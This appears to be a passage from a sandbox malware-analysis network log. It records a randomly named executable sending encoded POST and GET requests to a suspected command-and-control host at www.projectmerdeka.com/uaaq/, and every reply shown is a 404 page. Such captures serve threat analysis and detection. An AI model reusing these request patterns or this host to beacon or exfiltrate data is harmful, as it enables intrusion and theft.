                                                                                    Data Raw: 39 70 47 30 4c 3d 6a 4b 43 5a 35 78 30 33 4e 42 54 33 71 32 63 52 33 61 49 6f 43 55 78 6f 4d 5a 72 53 4f 2b 58 44 57 53 4f 50 43 38 4c 53 33 2f 6f 75 54 55 6a 7a 58 63 57 72 58 4d 70 52 52 4b 59 64 36 4a 52 44 78 39 73 75 47 62 58 77 6e 78 49 46 53 4b 75 43 6a 67 31 67 56 37 72 4a 54 72 74 45 4b 4e 75 6a 72 54 65 63 71 4c 66 45 7a 71 58 77 61 49 37 6e 44 61 72 7a 42 33 49 62 51 44 53 53 32 33 66 67 79 2b 4c 75 61 6a 4c 71 46 72 7a 43 50 6e 4b 6e 71 49 58 65 34 63 6e 31 66 77 73 2f 35 6d 4f 74 6d 63 61 44 33 52 4a 36 2f 39 73 41 55 79 32 4e 33 6c 2b 62 67 6c 46 2f 57 37 4e 35 43 4d 53 75 55 75 78 30 6e 54 73 3d
                                                                                    Data Ascii: 9pG0L=jKCZ5x03NBT3q2cR3aIoCUxoMZrSO+XDWSOPC8LS3/ouTUjzXcWrXMpRRKYd6JRDx9suGbXwnxIFSKuCjg1gV7rJTrtEKNujrTecqLfEzqXwaI7nDarzB3IbQDSS23fgy+LuajLqFrzCPnKnqIXe4cn1fws/5mOtmcaD3RJ6/9sAUy2N3l+bglF/W7N5CMSuUux0nTs=
                                                                                    Dec 4, 2023 12:08:22.580862999 CET1340INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1238
                                                                                    date: Mon, 04 Dec 2023 11:08:21 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                                                    Dec 4, 2023 12:08:22.580887079 CET244INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                                                    Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    55192.168.11.3049812203.175.9.19803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:08:25.106023073 CET1647OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.projectmerdeka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.projectmerdeka.com
                                                                                    Referer: http://www.projectmerdeka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 6a 4b 43 5a 35 78 30 33 4e 42 54 33 71 32 63 52 33 61 49 6f 43 55 78 6f 4d 5a 72 53 4f 2b 58 44 57 53 4f 50 43 38 4c 53 33 2f 67 75 54 44 6a 7a 57 37 36 72 57 4d 70 52 50 61 59 63 36 4a 52 65 78 39 46 6c 47 62 62 2f 6e 33 4d 46 54 73 61 43 72 79 4e 67 61 37 72 4a 63 4c 74 4a 56 39 75 32 72 54 75 59 71 4c 50 45 7a 71 58 77 61 4c 54 6e 56 37 72 7a 48 33 49 61 5a 6a 53 6f 38 58 65 48 79 2b 53 57 61 6a 48 63 45 62 54 43 49 48 61 6e 35 64 37 65 37 38 6e 4e 63 77 73 64 35 6a 57 49 6d 59 43 68 33 52 74 63 2f 37 63 41 58 58 57 53 6c 31 71 6d 38 30 78 64 63 4c 4a 43 4b 36 47 44 49 50 63 75 39 44 61 79 76 59 4f 7a 7a 63 72 61 7a 69 57 50 2b 41 46 31 7a 31 43 77 57 75 70 33 63 69 5a 55 6e 68 4b 73 35 38 49 55 46 6c 4e 6f 46 6e 4b 72 2b 34 46 77 38 35 36 2f 42 31 4d 2b 48 6b 38 6e 32 4d 38 74 34 77 45 63 65 6c 76 6f 63 62 57 36 77 77 49 2b 44 58 55 55 45 77 49 55 79 51 4f 4d 54 6e 39 75 4f 62 64 68 4b 55 74 65 4c 42 71 4f 75 73 34 79 30 65 6c 2b 36 36 52 66 34 61 43 4f 4b 47 55 68 49 42 4d 67 56 79 67 50 4f 51 55 78 58 53 42 50 4a 6e 4b 6a 6b 41 64 53 6c 78 70 37 45 6e 55 71 5a 4b 50 6b 70 76 36 30 49 6e 55 66 50 31 30 65 52 38 33 31 56 7a 2f 71 4b 6c 43 51 72 65 76 4e 42 41 7a 78 6f 70 78 4b 41 39 64 41 6f 32 62 58 79 47 39 74 4d 2b 2f 57 73 41 59 47 5a 4f 61 64 59 6c 32 70 55 62 73 4a 44 2b 38 37 45 53 73 30 4b 6a 59 36 6c 68 6a 34 49 6f 69 67 77 32 69 68 44 61 77 2f 42 6d 43 73 69 65 69 47 4d 46 46 6c 63 68 54 52 65 4b 45 34 34 57 30 54 75 4b 36 39 69 65 42 57 6e 4b 69 44 35 58 57 68 68 47 4e 4e 4c 38 41 66 2f 4f 47 5a 63 4c 2f 43 31 4d 31 6a 35 6c 70 57 32 4d 4c 49 74 43 4d 68 44 64 65 35 36 31 41 52 4e 38 34 36 42 48 4d 6b 67 4c 76 38 70 33 2b 36 46 6b 34 48 67 45 56 62 43 5a 67 59 70 78 69 7a 4f 65 45 76 4d 41 54 74 37 58 49 49 50 4c 52 53 7a 6e 41 34 79 71 56 49 39 61 30 2f 6e 43 4f 48 6f 39 35 35 6d 56 51 55 66 30 4b 36 4b 52 59 35 4a 67 7a 61 2b 54 47 61 66 6b 49 42 75 7a 77 7a 37 73 52 76 72 77 43 37 38 48 2f 34 61 42 6a 70 70 30 30 64 5a 66 39 41 74 34 47 48 39 56 6f 36 74 55 43 79 32 32 76 34 67 36 70 35 32 41 6c 47 75 55 53 38 45 5a 35 42 6e 42 30 30 5a 33 66 62 61 62 52 6b 2b 72 62 56 6c 54 2f 61 53 4f 57 4f 4c 44 58 67 4f 75 65 78 4f 49 4a 5a 45 45 65 34 71 35 36 45 6b 77 56 79 5a 6f 38 4e 43 39 64 6f 63 79 32 44 45 6c 35 6e 41 78 4d 47 4a 58 33 64 36 43 53 34 63 72 51 66 67 67 4a 4b 6a 77 4a 79 39 76 37 4a 4a 35 68 6e 4d 74 54 53 62 36 38 75 42 47 2f 5a 57 47 36 56 76 39 59 52 47 57 6a 68 6f 6f 42 36 64 61 31 6a 2f 34 4e 68 74 45 4c 75 68 50 66 6d 43 43 49 32 6b 72 44 43 6a 56 32 53 6d 79 36 6f 39 61 4d 61 4b 6a 42 6c 49 55 7a 72 41 50 6b 38 71 52 62 7a 31 53 6c 47 35 35 33 33 6b 48 4e 56 56 6e 6b 37 45 46 4e 36 64 56 45 78 66 2b 2f 55 4f 73 59 49 33 62 62 32 78 57 4a 62 36 4b 66 4a 52 56 69 7a 78 51 77 54 55 6e 61 41 63 78 31 50 50 6d 33 45 44 69 33 69 75 6b 32 4f 53 4a 48 56 49 77 56 39 70 6d 68 6a 66 41 6b 2f 56 62 6f 41 31 50 50 75 72 4e 49 51 70 78 71 50 4f 34 4d 44 73 45 79 43 71 4e 7a 79 37 49 47 49 4d 62 4e 77 55 4a 74 6b 46 67 6f 75 48 66 52 6c 44 46 2b 72 6a 4c 6a 4d 57 43 53 58 44 56 41 68 58 69 38 58 6d 59 50 68 72 52 39 35 63 62 34 78 64 79 4c 35 61 33 6e 6b 78 73 72 38 31 45 75 63 4b 42 79 50 30 39 52 35 70 73 35 52 35 65 73 69 52 6c 53 45 5a 69 6a 42 56 72 35 2b 70 66 57 52 41 31 61 36 37 56 52 70 50 37 43 52 65 73 76 4c 75 76 79 35 71 2f 6f 6d 52 4b 57 42 49 50 73 58
                                                                                    Data Ascii: 9pG0L=jKCZ5x03NBT3q2cR3aIoCUxoMZrSO+XDWSOPC8LS3/guTDjzW76rWMpRPaYc6JRex9FlGbb/n3MFTsaCryNga7rJcLtJV9u2rTuYqLPEzqXwaLTnV7rzH3IaZjSo8XeHy+SWajHcEbTCIHan5d7e78nNcwsd5jWImYCh3Rtc/7cAXXWSl1qm80xdcLJCK6GDIPcu9DayvYOzzcraziWP+AF1z1CwWup3ciZUnhKs58IUFlNoFnKr+4Fw856/B1M+Hk8n2M8t4wEcelvocbW6wwI+DXUUEwIUyQOMTn9uObdhKUteLBqOus4y0el+66Rf4aCOKGUhIBMgVygPOQUxXSBPJnKjkAdSlxp7EnUqZKPkpv60InUfP10eR831Vz/qKlCQrevNBAzxopxKA9dAo2bXyG9tM+/WsAYGZOadYl2pUbsJD+87ESs0KjY6lhj4Ioigw2ihDaw/BmCsieiGMFFlchTReKE44W0TuK69ieBWnKiD5XWhhGNNL8Af/OGZcL/C1M1j5lpW2MLItCMhDde561ARN846BHMkgLv8p3+6Fk4HgEVbCZgYpxizOeEvMATt7XIIPLRSznA4yqVI9a0/nCOHo955mVQUf0K6KRY5Jgza+TGafkIBuzwz7sRvrwC78H/4aBjpp00dZf9At4GH9Vo6tUCy22v4g6p52AlGuUS8EZ5BnB00Z3fbabRk+rbVlT/aSOWOLDXgOuexOIJZEEe4q56EkwVyZo8NC9docy2DEl5nAxMGJX3d6CS4crQfggJKjwJy9v7JJ5hnMtTSb68uBG/ZWG6Vv9YRGWjhooB6da1j/4NhtELuhPfmCCI2krDCjV2Smy6o9aMaKjBlIUzrAPk8qRbz1SlG5533kHNVVnk7EFN6dVExf+/UOsYI3bb2xWJb6KfJRVizxQwTUnaAcx1PPm3EDi3iuk2OSJHVIwV9pmhjfAk/VboA1PPurNIQpxqPO4MDsEyCqNzy7IGIMbNwUJtkFgouHfRlDF+rjLjMWCSXDVAhXi8XmYPhrR95cb4xdyL5a3nkxsr81EucKByP09R5ps5R5esiRlSEZijBVr5+pfWRA1a67VRpP7CResvLuvy5q/omRKWBIPsX
                                                                                    Dec 4, 2023 12:08:25.471582890 CET1340INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1238
                                                                                    date: Mon, 04 Dec 2023 11:08:24 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                                                    Dec 4, 2023 12:08:25.471645117 CET244INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                                                    Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    56192.168.11.3049816203.175.9.19803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:08:27.988677025 CET430OUTGET /uaaq/?9pG0L=uIq56BIwEgOtiyQr6743FVEUWeewfIvBTD+QAd7G5aNLRXmwRIDTY8coJ7Y84KRozcEAIYfXjUIHNLCJhW9aa5jrQ6gGBb360w==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.projectmerdeka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:08:28.347040892 CET1340INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1238
                                                                                    date: Mon, 04 Dec 2023 11:08:27 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
